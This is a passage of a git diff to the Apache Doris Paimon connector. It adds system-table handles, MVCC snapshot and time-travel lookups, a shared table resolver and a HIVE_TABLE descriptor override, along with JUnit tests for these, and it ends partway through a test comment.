org.apache.paimon.table.Table; +import org.apache.paimon.table.system.SystemTableLoader; import org.apache.paimon.types.DataField; import org.apache.paimon.types.DataTypeRoot; import org.apache.paimon.types.RowType; @@ -50,6 +55,7 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.OptionalLong; import java.util.Set; /** @@ -139,34 +145,104 @@ public Optional getTableHandle( public ConnectorTableSchema getTableSchema( ConnectorSession session, ConnectorTableHandle handle) { PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; - Identifier identifier = Identifier.create( - paimonHandle.getDatabaseName(), paimonHandle.getTableName()); - try { - Table table = catalogOps.getTable(identifier); - RowType rowType = table.rowType(); - List primaryKeys = table.primaryKeys(); - List columns = mapFields(rowType, primaryKeys); + // resolveTable branches on isSystemTable() to pick the 4-arg sys Identifier vs the 2-arg + // base Identifier on a transient-table-null reload, so a sys handle reads its OWN rowType. + Table table = resolveTable(paimonHandle); + RowType rowType = table.rowType(); + List primaryKeys = table.primaryKeys(); + List columns = mapFields(rowType, primaryKeys); + + Map schemaProps = new HashMap<>(); + if (paimonHandle.getPartitionKeys() != null + && !paimonHandle.getPartitionKeys().isEmpty()) { + schemaProps.put("partition_keys", + String.join(",", paimonHandle.getPartitionKeys())); + } + if (primaryKeys != null && !primaryKeys.isEmpty()) { + schemaProps.put("primary_keys", String.join(",", primaryKeys)); + } - Map schemaProps = new HashMap<>(); - if (paimonHandle.getPartitionKeys() != null - && !paimonHandle.getPartitionKeys().isEmpty()) { - schemaProps.put("partition_keys", - String.join(",", paimonHandle.getPartitionKeys())); - } - if (primaryKeys != null && !primaryKeys.isEmpty()) { - schemaProps.put("primary_keys", String.join(",", primaryKeys)); - } + return new ConnectorTableSchema( + paimonHandle.getTableName(), + columns, + "PAIMON", + schemaProps); + } + + // ==================== E7: System Tables ==================== + + /** + * Lists the system-table names paimon exposes. Connector-global: legacy + * {@code PaimonSysTable.SUPPORTED_SYS_TABLES} is built once from + * {@code SystemTableLoader.SYSTEM_TABLES} and applies to every paimon table, so this returns + * the same SDK list for any base handle (a defensive unmodifiable copy of the bare names, + * no {@code "$"} prefix). + */ + @Override + public List listSupportedSysTables(ConnectorSession session, + ConnectorTableHandle baseTableHandle) { + return Collections.unmodifiableList(new ArrayList<>(SystemTableLoader.SYSTEM_TABLES)); + } - return new ConnectorTableSchema( - paimonHandle.getTableName(), - columns, - "PAIMON", - schemaProps); + /** + * Resolves a handle for the named system table of {@code baseTableHandle}, or empty when + * paimon does not expose {@code sysName} (case-insensitive, per legacy + * {@code shouldForceJniForSystemTable}'s {@code equalsIgnoreCase} use) or the base table no + * longer exists. + * + *

    The system {@link Table} is loaded through the EXISTING {@link PaimonCatalogOps#getTable} + * seam by constructing the 4-arg sys {@link Identifier} + * {@code new Identifier(db, table, "main", sysName)} — no new seam method is needed because + * {@code CatalogBackedPaimonCatalogOps.getTable} passes the Identifier through to + * {@code catalog.getTable(identifier)} unchanged, and paimon's catalog dispatches to the + * system table when the Identifier carries a system-table name. The branch is HARDCODED + * {@code "main"}: non-"main" branch system tables are unsupported (legacy parity, see + * {@code PaimonSysExternalTable#getSysPaimonTable}). + * + *

    {@code forceJni} mirrors legacy {@code PaimonScanNode.shouldForceJniForSystemTable}: only + * {@code binlog} / {@code audit_log} are NAME-forced to the JNI reader. Other sys tables ("ro", + * metadata tables) are NOT force-forced here; their JNI-vs-native routing is decided at scan + * time by split type (T19), so this must not over-force. + */ + @Override + public Optional getSysTableHandle(ConnectorSession session, + ConnectorTableHandle baseTableHandle, String sysName) { + PaimonTableHandle base = (PaimonTableHandle) baseTableHandle; + // Null-safe: a null/unknown sysName is "this connector does not expose that sys table" + // (Optional.empty per the Javadoc contract), NOT an NPE/exception. + if (!isSupportedSysTable(sysName)) { + return Optional.empty(); + } + // Normalize to lowercase for handle identity parity with legacy: SysTable renders the suffix + // as "$" + sysTableName.toLowerCase(), so t$BINLOG and t$binlog must be the SAME handle + // (identical equals/hashCode/toString and the same sys Identifier). The support check above + // stays case-insensitive; only the canonical stored name is lowercased. + String sys = sysName.toLowerCase(java.util.Locale.ROOT); + Identifier sysId = new Identifier( + base.getDatabaseName(), base.getTableName(), "main", sys); + Table sysTable; + try { + sysTable = catalogOps.getTable(sysId); } catch (Catalog.TableNotExistException e) { - throw new RuntimeException("Paimon table not found: " + identifier, e); - } catch (Exception e) { - throw new RuntimeException("Failed to get Paimon table schema: " + identifier, e); + return Optional.empty(); } + boolean forceJni = "binlog".equals(sys) || "audit_log".equals(sys); + PaimonTableHandle handle = PaimonTableHandle.forSystemTable( + base.getDatabaseName(), base.getTableName(), sys, forceJni); + handle.setPaimonTable(sysTable); + return Optional.of(handle); + } + + private static boolean isSupportedSysTable(String sysName) { + if (sysName == null) { + return false; + } + for (String supported : SystemTableLoader.SYSTEM_TABLES) { + if (supported.equalsIgnoreCase(sysName)) { + return true; + } + } + return false; } @Override @@ -174,6 +250,113 @@ public Map getProperties() { return Collections.emptyMap(); } + // ==================== E5: MVCC Snapshots / Time Travel ==================== + + /** + * Returns the query-begin MVCC pin: the table's LATEST snapshot, used as the consistent version + * for every read of {@code handle} in this query (mirrors legacy + * {@code PaimonExternalTable.getPaimonSnapshotCacheValue} using {@code latestSnapshot().id()}). + * + *

    System tables MUST NOT expose MVCC (they are synthetic metadata views; pinning them to a + * data snapshot is meaningless — see also the T19 scan-node fail-loud guard), so a sys handle + * returns {@link Optional#empty()}. + * + *

    An EMPTY table (no snapshot yet) returns a snapshot whose id is the legacy + * {@code INVALID_SNAPSHOT_ID} (-1), NOT {@link Optional#empty()}: empty here means "no MVCC + * support", but paimon DOES support MVCC, so the connector still pins (legacy seeded -1 and only + * overwrote it when {@code latestSnapshot().isPresent()}). + */ + @Override + public Optional beginQuerySnapshot( + ConnectorSession session, ConnectorTableHandle handle) { + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + if (paimonHandle.isSystemTable()) { + return Optional.empty(); + } + Table table = resolveTable(paimonHandle); + long id = catalogOps.latestSnapshotId(table).orElse(-1L); + return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(id).build()); + } + + /** + * Time-travel by snapshot id. Returns the pinned snapshot when it exists, else + * {@link Optional#empty()} per the SPI Javadoc ("or empty if none"). + * + *

    CONTRACT DIFFERENCE (intentional, documented): legacy + * {@code PaimonUtil.getPaimonSnapshotBySnapshotId} THREW a {@code UserException} + * ("can't find snapshot by id") when the id was absent. The SPI contract here is empty-if-none, + * so surfacing the user-facing "not found" error is the B5 fe-core consumer's responsibility — + * this is NOT a silent data bug. + * + *

    System tables do not expose time-travel -> {@link Optional#empty()}. + */ + @Override + public Optional getSnapshotById( + ConnectorSession session, ConnectorTableHandle handle, long snapshotId) { + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + if (paimonHandle.isSystemTable()) { + return Optional.empty(); + } + Table table = resolveTable(paimonHandle); + if (!catalogOps.snapshotExists(table, snapshotId)) { + return Optional.empty(); + } + return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(snapshotId).build()); + } + + /** + * Time-travel by wall-clock time. Returns the latest snapshot committed at or before + * {@code timestampMillis}, else {@link Optional#empty()} when none qualifies. + * + *

    CONTRACT DIFFERENCE (intentional, documented): legacy + * {@code PaimonUtil.getPaimonSnapshotByTimestamp} THREW a {@code UserException} (with the + * earliest-snapshot's timestamp hint) when no snapshot was at-or-before the time. The SPI + * contract here is empty-if-none, so the B5 fe-core consumer is responsible for surfacing that + * user-facing error — this is NOT a silent data bug. + * + *

    System tables do not expose time-travel -> {@link Optional#empty()}. + */ + @Override + public Optional getSnapshotAt( + ConnectorSession session, ConnectorTableHandle handle, long timestampMillis) { + PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + if (paimonHandle.isSystemTable()) { + return Optional.empty(); + } + Table table = resolveTable(paimonHandle); + OptionalLong id = catalogOps.snapshotIdAtOrBefore(table, timestampMillis); + if (!id.isPresent()) { + return Optional.empty(); + } + return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(id.getAsLong()).build()); + } + + /** + * Builds the read-path Thrift descriptor for a paimon plugin table as a {@code HIVE_TABLE} + * carrying a {@link THiveTable}, mirroring legacy paimon ({@code PaimonExternalTable.toThrift} + * and {@code PaimonSysExternalTable.toThrift}, both of which send {@code TTableType.HIVE_TABLE} + * with a {@code THiveTable}) and the MaxCompute pattern + * ({@code MaxComputeConnectorMetadata.buildTableDescriptor}). + * + *

    Without this override the SPI default returns {@code null}, so fe-core falls back to + * {@code TTableType.SCHEMA_TABLE}; BE's {@code DescriptorTbl::create} then builds a + * {@code SchemaTableDescriptor} instead of the {@code HiveTableDescriptor} it builds for + * {@code HIVE_TABLE}, a descriptor-parity bug. This fix covers BOTH normal paimon plugin tables + * (closing the latent B2 descriptor gap) AND system tables, which inherit it through + * {@code PluginDrivenExternalTable.toThrift}. + */ + @Override + public TTableDescriptor buildTableDescriptor( + ConnectorSession session, + long tableId, String tableName, String dbName, + String remoteName, int numCols, long catalogId) { + THiveTable tHiveTable = new THiveTable(dbName, tableName, new HashMap<>()); + TTableDescriptor desc = new TTableDescriptor( + tableId, TTableType.HIVE_TABLE, numCols, 0, tableName, dbName); + desc.setHiveTable(tHiveTable); + return desc; + } + // ==================== DDL: Create/Drop Table ==================== /** @@ -453,22 +636,20 @@ private List collectPartitions(PaimonTableHandle paimonH /** * Resolves the live {@link Table} for a handle: prefer the transient reference, else re-load - * from the catalog seam. Mirrors the reload fallback originally inlined in - * {@link #getColumnHandles}. + * from the catalog seam. Delegates to the single sys-aware {@link PaimonTableResolver} shared + * with the scan path so there is exactly ONE reload rule (a sys handle reloads via the 4-arg + * sys {@link Identifier}; see {@link PaimonTableResolver#resolve}). This keeps every metadata + * read path ({@link #getTableSchema}, {@link #getColumnHandles}, {@link #collectPartitions}) + * sys-aware. + * + *

    Preserves this site's original wrapping of a reload failure as a {@link RuntimeException}. */ private Table resolveTable(PaimonTableHandle paimonHandle) { - Table table = paimonHandle.getPaimonTable(); - if (table == null) { - // Fallback: re-load from catalog - Identifier id = Identifier.create( - paimonHandle.getDatabaseName(), paimonHandle.getTableName()); - try { - table = catalogOps.getTable(id); - } catch (Exception e) { - throw new RuntimeException("Failed to load Paimon table: " + id, e); - } + try { + return PaimonTableResolver.resolve(catalogOps, paimonHandle); + } catch (Exception e) { + throw new RuntimeException("Failed to load Paimon table: " + paimonHandle, e); } - return table; } private List mapFields(RowType rowType, List primaryKeys) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 6eb2964d8fb84c..d6fc21ad5d9b26 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -106,25 +106,21 @@ public PaimonScanPlanProvider(Map properties, PaimonCatalogOps c /** * Returns the handle's transient Paimon {@link Table}, reloading it from the catalog seam * when the transient reference is null (e.g. after a serialization round-trip across the - * FE/BE boundary or plan reuse). Byte-identical to the reload fallback in - * {@link PaimonConnectorMetadata#getColumnHandles}. Package-private for direct unit testing. + * FE/BE boundary or plan reuse). Delegates to the single sys-aware {@link PaimonTableResolver} + * shared with the metadata path, so a deserialized SYSTEM handle reloads its own (sys) Table + * via the 4-arg sys {@link Identifier} instead of silently scanning the base table. + * Package-private for direct unit testing. * *

    NOTE: the reloaded Table may come from a different {@link org.apache.paimon.catalog.Catalog} * instance than the one that produced the handle. That is acceptable for this fallback safety * net (it is not snapshot-consistent with the handle's originating catalog). */ Table resolveTable(PaimonTableHandle paimonHandle) { - Table table = paimonHandle.getPaimonTable(); - if (table == null) { - Identifier id = Identifier.create( - paimonHandle.getDatabaseName(), paimonHandle.getTableName()); - try { - table = catalogOps.getTable(id); - } catch (Exception e) { - throw new RuntimeException("Failed to load Paimon table: " + id, e); - } + try { + return PaimonTableResolver.resolve(catalogOps, paimonHandle); + } catch (Exception e) { + throw new RuntimeException("Failed to load Paimon table: " + paimonHandle, e); } - return table; } @Override @@ -199,7 +195,7 @@ public List planScan( Optional> optRawFiles = dataSplit.convertToRawFiles(); Optional> optDeletionFiles = dataSplit.deletionFiles(); - if (supportNativeReader(optRawFiles)) { + if (shouldUseNativeReader(paimonHandle.isForceJni(), optRawFiles)) { // Native reader path List rawFiles = optRawFiles.get(); for (int i = 0; i < rawFiles.size(); i++) { @@ -328,7 +324,28 @@ private long computeSplitWeight(DataSplit dataSplit) { return dataSplit.rowCount(); } - private boolean supportNativeReader(Optional> optRawFiles) { + /** + * Decides whether a {@link DataSplit} may take the native (ORC/Parquet) reader path. + * + *

    The split is native-eligible iff (a) it is NOT name-forced to JNI by the handle, AND (b) its + * raw files all support the native reader (see {@link #supportNativeReader}). Gating on + * {@code forceJni} is the T19 fix: {@code binlog} / {@code audit_log} system tables are paimon + * {@code DataTable}s whose {@code DataSplit.convertToRawFiles()} may succeed, but the native + * reader cannot reproduce their read semantics (binlog pack/merge + array materialization; + * audit_log rowkind/sequence-number projection), so they would silently return wrong rows. Legacy + * forces them to JNI ({@code PaimonScanNode.shouldForceJniForSystemTable}, captured by + * {@link PaimonTableHandle#isForceJni()}). ONLY the {@code forceJni} flag gates this: metadata sys + * tables already go JNI via the non-DataSplit path, and a non-forced {@code DataTable} like "ro" + * (forceJni=false) must still be allowed native — so this must not over-force. + * + *

    Extracted as a pure static so the correctness-critical routing decision is unit-testable + * with real {@link RawFile}s, without driving a full Paimon {@code ReadBuilder}/{@code TableScan}. + */ + static boolean shouldUseNativeReader(boolean forceJni, Optional> optRawFiles) { + return !forceJni && supportNativeReader(optRawFiles); + } + + private static boolean supportNativeReader(Optional> optRawFiles) { if (!optRawFiles.isPresent() || optRawFiles.get().isEmpty()) { return false; } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java index e9c7c7b2d00dff..83f960b5e962e2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java @@ -21,12 +21,23 @@ import org.apache.paimon.table.Table; +import java.util.Collections; import java.util.List; import java.util.Objects; /** * Opaque table handle for Paimon tables. * Carries database name, table name, partition key names, and the Paimon Table reference. + * + *

    A handle may also represent a system table (e.g. {@code mytable$snapshots}). For a + * system handle {@link #sysTableName} is the bare sys-table name (no {@code "$"}) and + * {@link #isSystemTable()} returns true; {@link #forceJni} carries the name-forced JNI hint + * computed by {@link PaimonConnectorMetadata#getSysTableHandle}. This class is Java + * {@link java.io.Serializable} only (there is no GSON registration for it): {@link #sysTableName} + * and {@link #forceJni} are non-transient so they survive a Java serialization round-trip, while + * the resolved {@link Table} stays {@code transient} and is re-loaded (a sys handle via the 4-arg + * sys {@code Identifier}) when null. Normal handles keep {@code sysTableName == null} and + * {@code forceJni == false}. */ public class PaimonTableHandle implements ConnectorTableHandle { @@ -37,15 +48,50 @@ public class PaimonTableHandle implements ConnectorTableHandle { private final List partitionKeys; private final List primaryKeys; + /** + * Bare system-table name (no {@code "$"}), or {@code null} for a normal table handle. + * Serializable: a deserialized sys handle must still reload via the 4-arg sys Identifier. + */ + private final String sysTableName; + + /** + * Name-forced JNI hint for system tables (legacy parity: true only for {@code binlog} / + * {@code audit_log}). Always {@code false} for a normal handle. Serializable. + */ + private final boolean forceJni; + /** Transient Paimon Table reference; not serialized. Set by PaimonConnectorMetadata. */ private transient Table paimonTable; public PaimonTableHandle(String databaseName, String tableName, List partitionKeys, List primaryKeys) { + this(databaseName, tableName, partitionKeys, primaryKeys, null, false); + } + + /** + * Full constructor including the system-table fields. Use + * {@link #forSystemTable(String, String, String, boolean)} to build a sys handle. + */ + public PaimonTableHandle(String databaseName, String tableName, + List partitionKeys, List primaryKeys, + String sysTableName, boolean forceJni) { this.databaseName = Objects.requireNonNull(databaseName, "databaseName"); this.tableName = Objects.requireNonNull(tableName, "tableName"); this.partitionKeys = partitionKeys; this.primaryKeys = primaryKeys; + this.sysTableName = sysTableName; + this.forceJni = forceJni; + } + + /** + * Builds a system-table handle for {@code db.table$sysTableName}. Partition/primary keys are + * empty: system tables are scanned as their own (synthetic) tables, not as partitions of the + * base table. + */ + public static PaimonTableHandle forSystemTable(String databaseName, String tableName, + String sysTableName, boolean forceJni) { + return new PaimonTableHandle(databaseName, tableName, + Collections.emptyList(), Collections.emptyList(), sysTableName, forceJni); } public String getDatabaseName() { @@ -64,6 +110,21 @@ public List getPrimaryKeys() { return primaryKeys; } + /** Bare system-table name (no {@code "$"}), or {@code null} for a normal handle. */ + public String getSysTableName() { + return sysTableName; + } + + /** True when this handle represents a Paimon system table. */ + public boolean isSystemTable() { + return sysTableName != null; + } + + /** Name-forced JNI hint (true only for {@code binlog} / {@code audit_log} sys tables). */ + public boolean isForceJni() { + return forceJni; + } + /** Returns the transient Paimon Table reference, or null if not set. */ public Table getPaimonTable() { return paimonTable; @@ -83,16 +144,21 @@ public boolean equals(Object o) { return false; } PaimonTableHandle that = (PaimonTableHandle) o; - return databaseName.equals(that.databaseName) && tableName.equals(that.tableName); + // sysTableName is part of identity so a sys handle (db.table$snapshots) never equals its + // base handle (db.table) — they are distinct tables to the engine. + return databaseName.equals(that.databaseName) && tableName.equals(that.tableName) + && Objects.equals(sysTableName, that.sysTableName); } @Override public int hashCode() { - return Objects.hash(databaseName, tableName); + return Objects.hash(databaseName, tableName, sysTableName); } @Override public String toString() { - return databaseName + "." + tableName; + return sysTableName == null + ? databaseName + "." + tableName + : databaseName + "." + tableName + "$" + sysTableName; } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java new file mode 100644 index 00000000000000..3506f95a6478c6 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java @@ -0,0 +1,73 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.table.Table; + +/** + * Single sys-aware handle-to-{@link Table} resolver shared by the metadata read path + * ({@link PaimonConnectorMetadata}) and the scan path ({@link PaimonScanPlanProvider}). + * + *

    Both call sites used to carry their own reload-fallback. They diverged: the metadata twin was + * made sys-aware (T17) while the scan twin still reloaded the BASE table for every handle — so a + * deserialized system handle (transient {@link Table} lost) would silently resolve and scan the + * base table, returning wrong rows. Collapsing both into THIS one method removes that trap: there + * is exactly one reload rule and it is sys-aware. + * + *

    Contract: prefer the handle's transient {@link Table}; on null reload from the catalog seam — + * a {@linkplain PaimonTableHandle#isSystemTable() system handle} via the 4-arg sys + * {@link Identifier} {@code (db, table, "main", sysName)} (so the SYSTEM table is re-fetched, not + * the base table), a normal handle via the 2-arg {@code Identifier.create(db, table)}. + * + *

    NOTE: this resolver only picks the correct (sys) Table on reload. It does NOT do + * {@code forceJni} native-vs-JNI routing or fail-loud guards — those remain T19. + */ +final class PaimonTableResolver { + + private PaimonTableResolver() { + } + + /** + * Returns the handle's transient Paimon {@link Table}, or reloads it from {@code catalogOps} + * when the transient reference is null (e.g. after a serialization round-trip across the FE/BE + * boundary or plan reuse). A system handle reloads via the 4-arg sys {@link Identifier}; a + * normal handle via the 2-arg base {@link Identifier}. + * + *

    This method does NOT wrap the reload failure: each call site keeps its own + * exception-handling/wrapping. The only checked surface is the seam's + * {@link org.apache.paimon.catalog.Catalog.TableNotExistException}. + * + * @throws org.apache.paimon.catalog.Catalog.TableNotExistException if the seam reports the + * table is gone (callers wrap/translate as they did before). + */ + static Table resolve(PaimonCatalogOps catalogOps, PaimonTableHandle handle) + throws org.apache.paimon.catalog.Catalog.TableNotExistException { + Table table = handle.getPaimonTable(); + if (table != null) { + return table; + } + // Fallback reload. A sys handle MUST reload via the 4-arg sys Identifier so the SYSTEM + // table is re-fetched, not the base table. + Identifier id = handle.isSystemTable() + ? new Identifier(handle.getDatabaseName(), handle.getTableName(), + "main", handle.getSysTableName()) + : Identifier.create(handle.getDatabaseName(), handle.getTableName()); + return catalogOps.getTable(id); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonBuildTableDescriptorTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonBuildTableDescriptorTest.java new file mode 100644 index 00000000000000..453d6e54f51ce9 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonBuildTableDescriptorTest.java @@ -0,0 +1,84 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.thrift.TTableDescriptor; +import org.apache.doris.thrift.TTableType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Guards the paimon read-path table descriptor contract (P5-T19 Part B). + * + *

    WHY this matters: after the paimon cutover, a SELECT (normal OR system table) routes through + * {@code PluginDrivenExternalTable.toThrift()} -> {@code metadata.buildTableDescriptor(...)}. + * Legacy paimon ({@code PaimonExternalTable.toThrift} and {@code PaimonSysExternalTable.toThrift}) + * both send {@code TTableType.HIVE_TABLE} with a {@code THiveTable}. BE's + * {@code DescriptorTbl::create} builds a {@code HiveTableDescriptor} for {@code HIVE_TABLE} but a + * {@code SchemaTableDescriptor} for {@code SCHEMA_TABLE}. Without this override the SPI default + * returns {@code null}, fe-core falls back to {@code SCHEMA_TABLE}, and BE builds the wrong + * descriptor — a latent descriptor-parity bug for BOTH normal and system paimon plugin tables. + * Each assertion below encodes a BE-side requirement, not just the method's shape (Rule 9): this + * test FAILS if the override returns null (SPI default) or any non-HIVE_TABLE descriptor.

    + * + *

    The ctor only assigns its args; {@code buildTableDescriptor} never dereferences catalogOps / + * context / properties, so passing {@code null}/empty for them is safe and keeps the test offline.

    + */ +public class PaimonBuildTableDescriptorTest { + + @Test + public void buildsHiveTableDescriptorWithAddressing() { + PaimonConnectorMetadata metadata = new PaimonConnectorMetadata( + null, Collections.emptyMap(), new RecordingConnectorContext()); + + long tableId = 42L; + String tableName = "local_table"; + String dbName = "remote_db"; + String remoteName = "remote_table"; + int numCols = 7; + long catalogId = 100L; + + TTableDescriptor desc = metadata.buildTableDescriptor( + null, tableId, tableName, dbName, remoteName, numCols, catalogId); + + // (1) must not be null — null triggers the SCHEMA_TABLE fallback in fe-core. + Assertions.assertNotNull(desc, + "buildTableDescriptor must return a typed descriptor, never null (BE expects HIVE type)"); + // (2) BE builds a HiveTableDescriptor only for HIVE_TABLE; SCHEMA_TABLE would build the + // wrong descriptor (SchemaTableDescriptor) — the descriptor-parity bug this fix closes. + Assertions.assertEquals(TTableType.HIVE_TABLE, desc.getTableType(), + "table type must be HIVE_TABLE; SCHEMA_TABLE builds the wrong BE descriptor"); + // (3) BE reads hiveTable; it must be set (legacy paimon always set a THiveTable). + Assertions.assertTrue(desc.isSetHiveTable(), + "hiveTable must be set; legacy paimon (normal + sys) always sent a THiveTable"); + // (4) addressing + column count must be carried through. + Assertions.assertEquals(tableName, desc.getHiveTable().getTableName(), + "THiveTable.tableName must carry the tableName param"); + Assertions.assertEquals(dbName, desc.getHiveTable().getDbName(), + "THiveTable.dbName must carry the dbName param"); + Assertions.assertEquals(tableId, desc.getId(), "descriptor id must carry the tableId"); + Assertions.assertEquals(numCols, desc.getNumCols(), "descriptor numCols must carry numCols"); + Assertions.assertEquals(tableName, desc.getTableName(), + "descriptor tableName must carry the tableName param"); + Assertions.assertEquals(dbName, desc.getDbName(), + "descriptor dbName must carry the dbName param"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java new file mode 100644 index 00000000000000..bfceae03439470 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java @@ -0,0 +1,242 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorCapability; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.connector.spi.ConnectorContext; + +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.OptionalLong; +import java.util.Set; + +/** + * Tests for the paimon E5 MVCC / time-travel SPI methods (P5-T20): + * {@code beginQuerySnapshot}, {@code getSnapshotById}, {@code getSnapshotAt}, plus the + * {@code PaimonConnector.getCapabilities()} declaration. + * + *

    These drive a {@link RecordingPaimonCatalogOps} fake whose three MVCC seam methods + * ({@code latestSnapshotId}, {@code snapshotIdAtOrBefore}, {@code snapshotExists}) return plain + * {@code long}s / {@code boolean}s, so the metadata layer's LOGIC (sys-guard, empty-table->-1, + * found/empty mapping) is exercised entirely offline — no real paimon {@code Snapshot} / + * {@code SnapshotManager} is faked (those are impractical to construct without a live table). + */ +public class PaimonConnectorMetadataMvccTest { + + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); + } + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + /** A normal (non-system) handle with its transient Table already set (no reload needed). */ + private static PaimonTableHandle normalHandle(RecordingPaimonCatalogOps ops) { + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + ops.table = table; + handle.setPaimonTable(table); + return handle; + } + + /** A system handle (db1.t1$snapshots) with its transient sys Table set. */ + private static PaimonTableHandle sysHandle(RecordingPaimonCatalogOps ops) { + PaimonTableHandle handle = PaimonTableHandle.forSystemTable("db1", "t1", "snapshots", false); + FakePaimonTable sys = new FakePaimonTable( + "t1$snapshots", rowType("snapshot_id"), Collections.emptyList(), Collections.emptyList()); + ops.sysTable = sys; + handle.setPaimonTable(sys); + return handle; + } + + // ==================== beginQuerySnapshot ==================== + + @Test + public void beginQuerySnapshotReturnsLatestSnapshotId() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.of(42L); + + ConnectorMvccSnapshot snap = metadataWith(ops).beginQuerySnapshot(null, handle).get(); + + // WHY: the query-begin MVCC pin must be the table's LATEST snapshot id, so all reads in the + // query see one consistent version (legacy PaimonExternalTable used latestSnapshot().id()). + // MUTATION: returning a constant / the wrong seam value -> id != 42 -> red. + Assertions.assertEquals(42L, snap.getSnapshotId(), + "the begin-query pin must carry the table's latest snapshot id"); + Assertions.assertSame(handle.getPaimonTable(), ops.lastMvccTable, + "the live resolved Table must be passed to the latest-snapshot seam"); + } + + @Test + public void beginQuerySnapshotEmptyTableReturnsInvalidSnapshotId() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.latestSnapshotId = OptionalLong.empty(); // empty table: no snapshot yet + + ConnectorMvccSnapshot snap = metadataWith(ops).beginQuerySnapshot(null, handle).get(); + + // WHY: an empty paimon table (no snapshot) must STILL pin via a snapshot whose id is the + // legacy INVALID_SNAPSHOT_ID (-1) — NOT Optional.empty(). Optional.empty() would mean "this + // connector does not support MVCC", but paimon DOES; downstream the -1 sentinel signals + // "read whatever is current / empty" while 